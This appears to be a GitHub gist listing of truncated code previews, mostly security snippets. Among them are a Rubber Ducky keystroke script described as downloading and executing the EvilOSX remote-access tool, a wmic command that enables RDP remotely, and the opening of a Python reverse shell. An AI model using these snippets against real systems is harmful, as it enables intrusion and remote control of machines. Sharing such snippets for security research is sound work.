I hereby claim:
- I am darbym on github.
- I am darbym (https://keybase.io/darbym) on keybase.
- I have a public key whose fingerprint is 1EEC 0D05 9BFB 96EA 2907 77A4 B583 0C0D ADAF 1E8B
To claim this, I am signing this object:
# using pipenv install the requirements of tweepy | |
# git clone https://github.com/tweepy/tweepy.git | |
# cd tweepy | |
# pipenv install -r requirements.txt | |
# edit and add your username | |
# run this command to launch | |
# pipenv run python delete_all_tweets.py | |
from __future__ import absolute_import, print_function |
# Source: https://twitter.com/subTee/status/972367673186074624 | |
1. Get ProcMon # https://docs.microsoft.com/en-us/sysinternals/downloads/procmon | |
2. Set Filter For Path Contains "NAME NOT FOUND" | |
3. Set Filter For Path Contains "TreatAs" [Optional] | |
4. Set Filter For Username contains SYSTEM 😀 | |
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX | |
REM Also see https://ducktoolkit.com/vidpid/ | |
DELAY 1000 | |
GUI SPACE | |
DELAY 500 | |
STRING Termina | |
DELAY 1000 | |
ENTER | |
DELAY 1500 |
# NO WARRANTY DON'T BE EVIL | |
# Source: https://twitter.com/wincmdfu/status/945613485408387072 | |
# Enable RDP remotely via #wmic on #Windows 2008 and above: | |
C:\> wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1 |
# NO WARRANTY DON'T BE EVIL | |
# Source: https://twitter.com/UnaPibaGeek/status/929122646968754176 | |
import socket,subprocess,os | |
IP = '0.0.0.0' | |
PORT = 1337 | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect((IP,PORT)) |
#!/usr/bin/env bash | |
if [ $# -eq 0 ]; then | |
echo "ERROR: Usage: $0 <server_to_check> i.e. example.com" | |
exit 1 | |
fi | |
if [ $# -eq 1 ]; then | |
SERVER=$1 | |
fi |
#!/usr/bin/env bash | |
if [ $# -eq 0 ]; then | |
echo "ERROR: Usage: $0 <server_to_check> i.e. example.com" | |
exit 1 | |
fi | |
if [ $# -eq 1 ]; then | |
SERVER=$1 | |
fi |
RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
Past talks: | |
http://www.slideshare.net/KenJohnson61/aws-surival-guide | |
[Ken Johnson earlier talk on AWS security, dedicated to using these services (cloudwatch/config/cloudtrail)] | |
https://www.youtube.com/watch?v=g-wy9NdATtA&feature=youtu.be |
I hereby claim:
To claim this, I am signing this object: